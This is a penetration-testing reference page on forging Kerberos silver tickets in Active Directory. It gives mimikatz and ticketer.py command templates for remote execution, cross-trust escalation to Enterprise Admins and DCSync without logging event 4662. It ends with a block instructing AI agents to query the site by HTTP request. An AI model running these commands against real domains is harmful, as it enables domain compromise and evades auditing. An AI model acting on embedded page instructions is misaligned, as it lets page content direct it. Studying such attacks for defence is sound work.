# Exploitation - Kerberos silver tickets ### Overview `Service tickets` are generated by the `Ticket-Granting Service (TGS)` of the `Key Distribution Center (KDC)` and used by clients to access domain resources exposed through service accounts, i.e user accounts that have a `ServicePrincipalName (SPN)` configured. `Service tickets` are generated by the `TGS` upon reception of a valid `Ticket-Granting Ticket (TGT)` using: * One of the secrets (`RC4 key`, whose value is identical to the `NTLM` hash, or `AES 128/256 bits keys`) of the `krbtgt` account (`KDC Signature`). * One of the secrets of the targeted service account (`Server Signature` and encryption of the `TGS`). However, as the service account has no knowledge of the the `krbtgt` account's secrets, no verification is done by default on the `KDC Signature` signature upon receipt and verification of the validity of a `service ticket`. Thus, in the majority of environment, only the knowledge of one of the secrets of the targeted service account is necessary for the generation of valid `service tickets` for the service (and renewals of the `krbtgt`'s password do not invalidate the crafted `service tickets`). Note that the `Kerberos PAC Validation` mechanism can be enabled on a service to enforce a systematic verification of the `service tickets`'s `Privilege Attribute Certificate (PAC)` `KDC Signature` signature with a request to the `KDC`. As the additional verification induced by the mechanism requires an exchange between the server hosting the service and the `KDC`, its activation can cause significant performance degradation. For more information on the `Kerberos` protocol, refer to the \`ActiveDirectory * Kerberos Golden Tickets\` note. To generate a `silver ticket`, the following prerequisites are needed: * The fully qualified domain name and the `SID` of the targeted domain. * The `SPN` and one of the secrets of the targeted service account. **Computers services and machine account exploitation** Windows systems integrated to an Active Directory domain expose a number of services, executed under the machine account authority. These services can be leveraged to remotely access and execute commands on a machine. As such, the compromise of one of the machine account secrets can be used to generate `silver tickets` allowing for remote code execution. `Silver tickets` for machine services can notably be used for persistence after the compromise of a machine or an Active Directory domain (as the secrets of the machine accounts of all the machines integrated to the domain are stored in the `ntds.dit` database). Additionally, if a machine exposes the Windows `SpoolerService` service, through the `MS-RPRN` `MSRPC` interface, and is configured to permit the use of `NetNTLMv1` (`LMCompatibilityLevel` attribute set to 2 or lower), an authentication from the machine to an arbitrary host in `NetNTLMv1` can be remotely triggered and further captured, to ultimately crack the `NetNTLMv1` hash and retrieve the machine account `NTLM` hash. For more information on the attack refer to the `[L7] MSRPC` and `[ActiveDirectory] NTLM capture and relay` notes. Different services are exposed on Windows systems integrated to an Active Directory domain and can be targeted, through their respective `SPN` in the form of `/`, for persistence and remote access: | Possible operation | Service(s) | Description | Related note | | ----------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------------------------------------------------------------------- | |

PsExec-like
file system access

| `CIFS` | Remote execution of commands using `PsExec`-like utilities or full access to the machine file system. |

Windows - Lateral movements
\[L7] 445 - SMB

| | `WMI` |

HOST
RPCSS

| Remote execution of commands through `Windows Management Instrumentation (WMI)` (`Win32_Process` class for example). | `Windows - Lateral movements` | | `WinRM` |

Always necessary:
HOST
HTTP
Host dependant:
WSMAN
RPCSS

| `PowerShell remoting` through `Windows Remote Management (WinRM)`. |

Windows - Lateral movements
\[L7] 5985-5968 - WSMan

| | Windows services | `HOST` | Remote creation and/or execution of Windows services. | `Windows - Lateral movements` | | Scheduled tasks | `HOST` | Remote creation and/or execution of Windows scheduled tasks. | `Windows - Lateral movements` | |

DCSync
LDAP access

| `LDAP` | `LDAP` requests, and notably allows, for `service tickets` to the `LDAP` service of a `Domain Controller`, the conduct of replication operations (`DCSync`). | `[ActiveDirectory] ntds.dit dumping` | | `RSAT` |

CIFS
LDAP
RPCSS

| Use of the PowerShell cmdlets of the Windows `Remote Server Administration Tools (RSAT)` suite. | `[ActiveDirectory] Domain Recon` | The `HOST` service for Windows machines includes a set of machine built-in Windows services, such as the `HTTP`, `SCM` and `SCHEDULE` services, etc. The exhaustive list of services exposed on a Windows machine integrated to an Active Directory domain can be retrieved using the following PowerShell command: ``` # DOMAIN_ROOT_OBJECT = "DC=LAB,DC=AD" for example Get-ADObject -Identity "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration, " -properties sPNMappings ``` ### Silver tickets generation The `mimikatz` utility on Windows and the `Impacket`'s `ticketer.py` Python script can be used to generate `silver tickets`: ``` # (mimikatz) /id: / (ticketer.py) -user-id # Impersonated user Relative ID (RID). Default to 500 (Built-in Administrator account RID). # (mimikatz) /groups: / (ticketer.py) -groups # Impersonated groups membership, in the form of one or a list of groups RID. Default groups RIDs: 513 (Domain Users), 512 (Domain Admins), 520 (Group Policy Creator Owners), 518 (Schema Admins), and 519 (Enterprise Admins, only effective if targeting the root domain). # (mimikatz) /sids: / (ticketer.py) -extra-sid # Additional and arbitrary SID(s) (that may or may not belong to the current domain) to include in the PAC, as if the SIDs were defined in the `SIDHistory` attribute of a domain user. # (mimikatz) /ptt - Directly inject the generated silver ticket in memory # From an authorization standpoint, the specified username does not matter. mimikatz.exe "kerberos::golden /user: /domain: /sid: /target: [/rc4: | /aes128: | /aes256:] /service: [/id:] [/groups:] [/sids:] /ptt" "exit" ticketer.py -domain -domain-sid -spn [-nthash | -aesKey ] [-user-id ] [-groups ] -[extra-sid ] # Access to a Windows system through WinRM (PowerShell Remoting) using one of the targeted computer secret. # Silver tickets the HOST and HTTP services are necessary and usually sufficient. Silver tickets for the WSMAN and/or RPCSS services may additionally be required. mimikatz.exe "kerberos::golden /user: /domain: /sid: /target: [/rc4: | /aes128: | /aes256:] /service:host /ptt" "exit" mimikatz.exe "kerberos::golden /user: /domain: /sid: /target: [/rc4: | /aes128: | /aes256:] /service:http /ptt" "exit" # Impersonates an user member of the "Enterprise Admins" group of the root domain in order to compromise the root domain from any trusted child domain. # For more information, refer to the "Active Directory - Trusts hopping" note. mimikatz.exe "kerberos::golden /user: /domain: /sid: /target: [/rc4: | /aes128: | /aes256:] /service: /sids:"S-1-5-21--519" /ptt" "exit" # Impersonates a Domain Controller in order to conduct DCSync attack without generating Windows "Security" events ("Event 4662: An operation was performed on an object"). # The can be obtained using: (New-Object System.Security.Principal.NTAccount(""," /domain: /sid:: /target: [/rc4: | /aes128: | /aes256:] /service:ldap /id: /groups:516 /sids:S-1-5-21--516,S-1-5-9" /ptt" "exit" ``` ### Silver tickets usage (Pass-the-Ticket) On Windows, `silver tickets` generated using `mimikatz` will be automatically injected in the current logon session if the `/ptt` option is specified. Otherwise, an exported `silver ticket` can be injected using `mimikatz.exe "kerberos::ptt ` for example. On Linux, `silver tickets` generated by `ticketer.py`, in the `credential cache (ccache)` format, can be exported in the `KRB5CCNAME` environment variable for further use through tools supporting the `Kerberos` protocol, such as others `Impacket` Python utilities. Note that `impackets` utilities can only make use of a single `Kerberos tickets` at a time, which limits the possible usage of the utilities with `silver tickets`. Refer to the `[ActiveDirectory] Kerberos tickets usage` for more information on techniques and tools to leverage `silver tickets`. *** ### References TECHNIQUES DE PERSISTANCE ACTIVE DIRECTORY BASÉES SUR KERBEROS - MISC Hors-Série N°20 --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.qazeer.io/active-directory/exploitation-kerberos_silver_tickets.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.